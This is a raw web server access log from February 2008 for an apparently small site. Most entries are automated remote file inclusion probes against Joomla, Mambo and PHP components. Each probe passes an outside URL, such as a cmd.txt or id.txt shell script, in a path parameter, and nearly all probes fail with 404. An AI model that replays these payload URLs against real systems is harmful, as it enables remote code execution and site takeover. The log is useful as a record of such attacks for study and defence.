194.213.194.42 - - [14/Feb/2008:10:05:20 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:10:07:45 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:10:07:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:10:07:46 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:08:03 -0800] "GET /logs/access_080120.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:08:04 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:08:05 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.177.187.23 - - [14/Feb/2008:10:08:16 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.177.187.23 - - [14/Feb/2008:10:08:16 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
195.116.188.138 - - [14/Feb/2008:10:10:10 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://jabujabujabu.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:11:25 -0800] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:11:25 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:11:26 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:11:40 -0800] "GET /logs/access_080103.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:11:41 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:11:41 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:11:53 -0800] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:11:54 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:11:54 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:12:11 -0800] "GET /logs/access_080103.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:12:11 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:12:12 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:12:14 -0800] "GET /logs/access_080103.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:12:14 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:12:15 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.108 - - [14/Feb/2008:10:12:22 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.94 - - [14/Feb/2008:10:12:23 -0800] "GET /logs/access.log HTTP/1.0" 200 281562 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:12:24 -0800] "GET /logs/access_080129.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:12:28 -0800] "GET /logs/access_080103.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:12:28 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [14/Feb/2008:10:12:29 -0800] "PROPFIND /instmsg/aliases/davep HTTP/1.1" 404 275 "-" "-" "dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:12:29 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:12:43 -0800] "GET /logs/access_080129.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.239.16.35 - - [14/Feb/2008:10:13:00 -0800] "GET /logs/access_080108.log//modules/4nAlbum/public/displayCategory.php?basepath=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.239.16.35 - - [14/Feb/2008:10:13:00 -0800] "GET /logs/access_080108.log//modules/4nAlbum/public/displayCategory.php?basepath=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.239.16.35 - - [14/Feb/2008:10:13:00 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.239.16.35 - - [14/Feb/2008:10:13:00 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.239.16.35 - - [14/Feb/2008:10:13:00 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.239.16.35 - - [14/Feb/2008:10:13:01 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:13:08 -0800] "GET /logs/access_080131.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:13:47 -0800] "GET /logs/access_080120.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:13:48 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:13:48 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:13:58 -0800] "GET /logs/access_080130.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:13:58 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:13:59 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:14:01 -0800] "GET /logs/access_080103.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:14:09 -0800] "GET /logs/access_080129.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:14:11 -0800] "GET /logs/access_080129.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:14:24 -0800] "GET /logs/access_080129.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:14:25 -0800] "GET /logs/access_080129.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:14:26 -0800] "GET /logs/access_080130.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.24.226 - - [14/Feb/2008:10:14:59 -0800] "GET /logs/access_080121.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [14/Feb/2008:10:14:59 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [14/Feb/2008:10:14:59 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:10:15:16 -0800] "GET /logs/access_080120.log/dministrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:10:15:16 -0800] "GET /dministrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:10:15:16 -0800] "GET /logs/dministrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:15:28 -0800] "GET /logs/access_080117.log/start.php?page=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:15:28 -0800] "GET /start.php?page=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:15:28 -0800] "GET /logs/start.php?page=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:10:15:41 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:10:15:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:10:15:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:10:16:15 -0800] "GET /logs/access_080108.log/dministrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:16:40 -0800] "GET /logs/access_080130.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:16:41 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:16:41 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:16:44 -0800] "GET /logs/access_080103.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:10:17:27 -0800] "GET /logs/access_080117.log//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:10:17:28 -0800] "GET //mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:10:17:31 -0800] "GET /logs//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:17:44 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:17:45 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:17:45 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:17:45 -0800] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.50.26 - - [14/Feb/2008:10:18:08 -0800] "GET //active/components/xmlrpc/client.php?c[components]=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
64.38.50.26 - - [14/Feb/2008:10:18:09 -0800] "GET /logs//active/components/xmlrpc/client.php?c[components]=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:10:18:19 -0800] "GET /logs/access_080103.log//tools/send_reminders.php?noSet=0&includedir=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:10:18:19 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:10:18:29 -0800] "GET /logs/access_080201.log//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [14/Feb/2008:10:18:34 -0800] "GET /start.php?page=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:10:18:36 -0800] "GET /logs/access_080117.log//tools/send_reminders.php?noSet=0&includedir=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:18:40 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:18:41 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:18:41 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:10:19:02 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.251.172.41 - - [14/Feb/2008:10:19:30 -0800] "GET //includes/orderSuccess.inc.php?include($glob['rootDir']=http://www.mta.cl/galeria2/galery.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.152.41.4 - - [14/Feb/2008:10:19:34 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phpbx.iespana.es/test.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
203.152.41.4 - - [14/Feb/2008:10:19:35 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phpbx.iespana.es/test.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:19:46 -0800] "GET /logs/access_080131.log//modules/Neos_Chronos/header.php?base_folder=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:19:47 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:19:47 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.239.16.35 - - [14/Feb/2008:10:20:34 -0800] "GET /logs/access_080105.log//modules/4nAlbum/public/displayCategory.php?basepath=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.239.16.35 - - [14/Feb/2008:10:20:34 -0800] "GET /logs/access_080105.log//modules/4nAlbum/public/displayCategory.php?basepath=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:10:20:43 -0800] "GET /logs/access_080117.log//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:10:20:44 -0800] "GET //mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:10:20:44 -0800] "GET /logs//mcf.php?content=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.209.207 - - [14/Feb/2008:10:20:45 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [14/Feb/2008:10:20:45 -0800] "GET /presto/?S=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
